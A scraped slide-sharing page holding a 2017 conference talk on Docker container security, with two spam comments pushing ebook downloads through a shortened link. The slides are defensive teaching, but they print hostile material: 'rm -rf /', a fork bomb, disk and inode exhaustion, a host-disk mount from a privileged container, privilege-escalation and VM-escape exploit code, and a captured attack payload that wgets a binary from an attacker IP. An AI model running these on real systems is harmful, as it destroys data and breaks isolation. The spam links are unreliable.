Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

How Secure Are Docker Containers?

205 views

Published on

Presented at Velocity London 2017

Published in: Technology
  • DOWNLOAD FULL BOOKS INTO AVAILABLE FORMAT ......................................................................................................................... ......................................................................................................................... 1.DOWNLOAD FULL PDF EBOOK here { https://tinyurl.com/y8nn3gmc } ......................................................................................................................... 1.DOWNLOAD FULL EPUB Ebook here { https://tinyurl.com/y8nn3gmc } ......................................................................................................................... 1.DOWNLOAD FULL doc Ebook here { https://tinyurl.com/y8nn3gmc } ......................................................................................................................... 1.DOWNLOAD FULL PDF EBOOK here { https://tinyurl.com/y8nn3gmc } ......................................................................................................................... 1.DOWNLOAD FULL EPUB Ebook here { https://tinyurl.com/y8nn3gmc } ......................................................................................................................... 1.DOWNLOAD FULL doc Ebook here { https://tinyurl.com/y8nn3gmc } ......................................................................................................................... ......................................................................................................................... ......................................................................................................................... .............. Browse by Genre Available eBooks ......................................................................................................................... Art, Biography, Business, Chick Lit, Children's, Christian, Classics, Comics, Contemporary, Cookbooks, Crime, Ebooks, Fantasy, Fiction, Graphic Novels, Historical Fiction, History, Horror, Humor And Comedy, Manga, Memoir, Music, Mystery, Non Fiction, Paranormal, Philosophy, Poetry, Psychology, Religion, Romance, Science, Science Fiction, Self Help, Suspense, Spirituality, Sports, Thriller, Travel, Young Adult,
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • //DOWNLOAD THIS BOOKS INTO AVAILABLE FORMAT ......................................................................................................................... ......................................................................................................................... //DOWNLOAD PDF EBOOK here { https://tinyurl.com/y8nn3gmc } ......................................................................................................................... //DOWNLOAD EPUB Ebook here { https://tinyurl.com/y8nn3gmc } ......................................................................................................................... //DOWNLOAD doc Ebook here { https://tinyurl.com/y8nn3gmc } ......................................................................................................................... //DOWNLOAD PDF EBOOK here { https://tinyurl.com/y8nn3gmc } ......................................................................................................................... //DOWNLOAD EPUB Ebook here { https://tinyurl.com/y8nn3gmc } ......................................................................................................................... //DOWNLOAD doc Ebook here { https://tinyurl.com/y8nn3gmc } ......................................................................................................................... ......................................................................................................................... ......................................................................................................................... .............. Browse by Genre Available eBooks ......................................................................................................................... Art, Biography, Business, Chick Lit, Children's, Christian, Classics, Comics, Contemporary, Cookbooks, Crime, Ebooks, Fantasy, Fiction, Graphic Novels, Historical Fiction, History, Horror, Humor And Comedy, Manga, Memoir, Music, Mystery, Non Fiction, Paranormal, Philosophy, Poetry, Psychology, Religion, Romance, Science, Science Fiction, Self Help, Suspense, Spirituality, Sports, Thriller, Travel, Young Adult,
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • Be the first to like this

How Secure Are Docker Containers?

  1. 1. How Secure Are Containers? @Ben_Hall Ben@Katacoda.com Katacoda.com
  2. 2. “Containers Don’t Contain”
  3. 3. How Secure Are Containers? @Ben_Hall Ben@Katacoda.com Katacoda.com
  4. 4. @Ben_Hall / Blog.BenHall.me.uk Microsoft MVP – Cloud and Data Centre Management Tech Support > Tester > Developer > Founder > Docker London Organiser WHOAMI?
  5. 5. Learn for free via Interactive Browser-Based Labs Katacoda.com
  6. 6. “What happens when you give anonymous unrestricted access to a hosted Docker container & daemon?” This is how we [try to] protect ourselves
  7. 7. Google slowing down
  8. 8. $ whoami $ pwd $ cd / $ ls $ apt-get install <some package> $ passwd $ rm –rf /
  9. 9. Dockerfile RUN adduser <new user> USER <new user> $ docker run –u <new user>
  10. 10. CanIHazNonPrivilegedContainers.info
  11. 11. $ whoami root $ fallocate 1000T /etc/hosts Because of how Docker maps /etc/hosts, this will fill the hosts Docker partition. Bye bye system.
  12. 12. $ uptime $ free -m $ df -h $ cat /proc/cpuinfo $ uname -a
  13. 13. $ reboot $ shutdown now
  14. 14. “It also allows the container to access local network services + like D-bus and is therefore considered insecure” $ docker run --net=host -it ubuntu bash root@ubuntu:/# shutdown now root@ubuntu:/# $ docker run --net=host -it ubuntu bash Post http://docker:2345/v1.20/containers/create: EOF. * Are you trying to connect to a TLS-enabled daemon without TLS? * Is your docker daemon up and running?
  15. 15. --privileged Containers
  16. 16. $ docker run --privileged –d nginx $ ./exploit container> df –h Filesystem Size Used Avail Use% Mounted on overlay 19G 2.7G 15G 16% / /dev/vda1 19G 2.7G 15G 16% /etc/hosts shm 64M 0 64M 0% /dev/shm container> mkdir -p /tmp2; mount /dev/vda1 /tmp2 container> ls /tmp2 container> cat /tmp2/root/.docker/config
  17. 17. Docker provides a lot out of the box but not everything… https://www.nccgroup.trust/globalassets/our-research/us/whitepapers/2016/april/ncc_group_understanding_hardening_linux_containers-1-1.pdf
  18. 18. :(){ :|: & };:
  19. 19. Resource Exhaustion
  20. 20. $ whoami root $ fallocate 1000T /etc/hosts $ whoami non-root-user $ fallocate 1000T /mydata Use ZFS file system. Enables Disk space quotas on a per container level.
  21. 21. $ printf '%s ' {1..1310725} | xargs touch $ df -i Filesystem Inodes IUsed IFree IUse% Mounted on /dev/xvda1 1310720 1310720 0 100% / $ df -h Filesystem Size Used Avail Use% Mounted on /dev/sda1 59G 16G 43G 26% /
  22. 22. Privilege Escalation
  23. 23. Kernel (Ubuntu 16.04) BPF Exploit int main(void) { if (setuid(0) || setgid(0)) err(1, "setuid/setgid"); fputs("we have root privs now...n", stderr); execl("/bin/bash", "bash", NULL); err(1, "execl"); } https://www.exploit-db.com/exploits/39772/
  24. 24. Restrictions • Namespaces – What can I see • Capabilities – What can I do? • Cgroups – How much of something can I use? • Seccomp – What can I call? • AppArmor – What can my app do?
  25. 25. Cgroup Settings • Limit a container to a share of the resource > --cpu-shares > --cpuset-cpus > --memory-reservation > --kernel-memory > --blkio-weight (block IO) > --device-read-iops > --device-write-iops
  26. 26. Seccomp & AppArmor
  27. 27. Everything is a syscall • In Linux all applications interact with Kernel via System Calls • strace outputs all the calls • Limit what calls can or cannot be executed
  28. 28. { "name": ”open", "action": "SCMP_ACT_ALLOW", "args": [] } { "name": ”read", "action": "SCMP_ACT_ALLOW", "args": [] } { "name": "fchmodat", "action": "SCMP_ACT_ERRNO", "args": [] }
  29. 29. { "name": ”modify_ldt", "action": "SCMP_ACT_ERRNO", "args": [] }
  30. 30. { "name": ”mmap", "action": "SCMP_ACT_ERRNO", "args": [] }
  31. 31. $ docker run --security-opt=”seccomp:nodirtycow.json” amouat/dirty-cow-test
  32. 32. AppArmor
  33. 33. $ cat docker-nginx #include <tunables/global> profile docker-nginx flags=(attach_disconnected,mediate_deleted) { #include <abstractions/base> network inet tcp, network inet udp, network inet icmp, deny network raw, deny network packet, file, umount, deny /bin/** wl, deny /boot/** wl, deny /dev/** wl, deny /etc/** wl, deny /home/** wl, deny /lib/** wl, deny /lib64/** wl, /usr/sbin/nginx ix, deny /bin/dash mrwklx, deny /bin/sh mrwklx, deny /usr/bin/top mrwklx, capability chown, capability dac_override, capability setuid, capability setgid, capability net_bind_service, deny @{PROC}/{*,**^[0-9*],sys/kernel/shm*} wkx, deny @{PROC}/sysrq-trigger rwklx, deny @{PROC}/mem rwklx, deny @{PROC}/kmem rwklx, deny @{PROC}/kcore rwklx, deny mount, deny /sys/[^f]*/** wklx, deny /sys/f[^s]*/** wklx, deny /sys/fs/[^c]*/** wklx, deny /sys/fs/c[^g]*/** wklx,
  34. 34. https://github.com/docker/libentitlement $ docker run --rights=network.admin nginx:latest
  35. 35. Intel Clear Containers
  36. 36. https://clearlinux.org/blogs/how-intel%C2%AE-clear-containers-protects-against-root-kernel-exploits-dirty-cow
  37. 37. https://clearlinux.org/blogs/how-intel%C2%AE-clear-containers-protects-against-root-kernel-exploits-dirty-cow
  38. 38. Container Security Solutions
  39. 39. What happens when it all goes wrong?
  40. 40. Hosting provider becomes unhappy
  41. 41. org.elasticsearch.search.SearchParseException: [index][3]: query[ConstantScore(*:*)],from[-1],size[1]: Parse Failure [Failed to parse source [{"size":1,"query":{"filtered":{"query":{"match_all":{}}}},"script_fields":{"exp":{"s cript":"import java.util.*;nimport java.io.*;nString str = "";BufferedReader br = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec("wget -O /tmp/xdvi http://<IP Address>:9985/xdvi").getInputStream()));StringBuilder sb = new StringBuilder();while((str=br.readLine())!=null){sb.append(str);}sb.toString();" }}}]] http://blog.benhall.me.uk/2015/09/what-happens-when-an-elasticsearch-container-is-hacked/
  42. 42. C /bin C /bin/netstat C /bin/ps C /bin/ss C /etc C /etc/init.d A /etc/init.d/DbSecuritySpt A /etc/init.d/selinux C /etc/rc1.d A /etc/rc1.d/S97DbSecuritySpt A /etc/rc1.d/S99selinux C /etc/rc2.d A /etc/rc2.d/S97DbSecuritySpt A /etc/rc2.d/S99selinux C /etc/rc3.d A /etc/rc3.d/S97DbSecuritySpt A /etc/rc3.d/S99selinux C /etc/rc4.d A /etc/rc4.d/S97DbSecuritySpt A /etc/rc4.d/S99selinux C /etc/rc5.d http://blog.benhall.me.uk/2015/09/what-happens-when-an-elasticsearch-container-is-hacked/ A /etc/rc5.d/S97DbSecuritySpt A /etc/rc5.d/S99selinux C /etc/ssh A /etc/ssh/bfgffa A /os6 A /safe64 C /tmp A /tmp/.Mm2 A /tmp/64 A /tmp/6Sxx A /tmp/6Ubb A /tmp/DDos99 A /tmp/cmd.n A /tmp/conf.n A /tmp/ddos8 A /tmp/dp25 A /tmp/frcc A /tmp/gates.lod A /tmp/hkddos A /tmp/hsperfdata_root A /tmp/linux32 A /tmp/linux64 A /tmp/manager A /tmp/moni.lod A /tmp/nb A /tmp/o32 A /tmp/oba A /tmp/okml A /tmp/oni A /tmp/yn25 C /usr C /usr/bin A /usr/bin/.sshd A /usr/bin/dpkgd A /usr/bin/dpkgd/netstat A /usr/bin/dpkgd/ps A /usr/bin/dpkgd/ss
  43. 43. Read Only Containers > docker run –-read-only –v /data:/data elasticsearch
  44. 44. Read Only Containers > docker run –-read-only --security-opt=no-new-privileges --security-opt="apparmor:es-profile” –v /data:/data elasticsearch
  45. 45. Is Docker Secure? • Yes. Docker is secure* • Make sure you enable the security features • ElasticSearch hack would have taken over entire box • But only as secure as your practices
  46. 46. $ docker run benhall/cute-kittens Error: Missing docker.sock Usage: docker run -v /var/run/docker.sock:/var/run/docker.sock benhall/cute-kittens $ docker run -v /var/run/docker.sock:/var/run/docker.sock benhall/cute-kittens
  47. 47. if [ -e /var/run/docker.sock ]; then echo "**** Launching ****” docker run --privileged busybox ls /dev echo "**** Cute kittens ****" else echo "Error: Missing docker.sock” fi
  48. 48. $ docker run -v /var/run/docker.sock:/var/run/docker.sock -p 80:80 vulnerable-application
  49. 49. DockerBench.com
  50. 50. Katacoda Security Content @ https://katacoda.com/courses/doc ker-security
  51. 51. Security Without Containers?
  52. 52. Think VMs contain? CVE-2016-3710: QEMU: out-of-bounds memory access issue Venom QEMU/KVM – Attack via floppy driver #include <sys/io.h> #define FIFO 0x3f5 int main() { int i; iopl(3); outb(0x0a,0x3f5); /* READ ID */ for (i=0;i<10000000;i++) outb(0x42,0x3f5); /* push */ }
  53. 53. Privileged containers are not Contained! Docker.sock file is sensitive! https://katacoda.com/courses/docker-security Apply Seccomp, AppArmor, PidsLimit They will save you when things go wrong Remember, run Docker / Kubernetes Bench IDS and Container Security tooling are still key
  54. 54. @Ben_Hall Ben@Katacoda.com www.Katacoda.com

×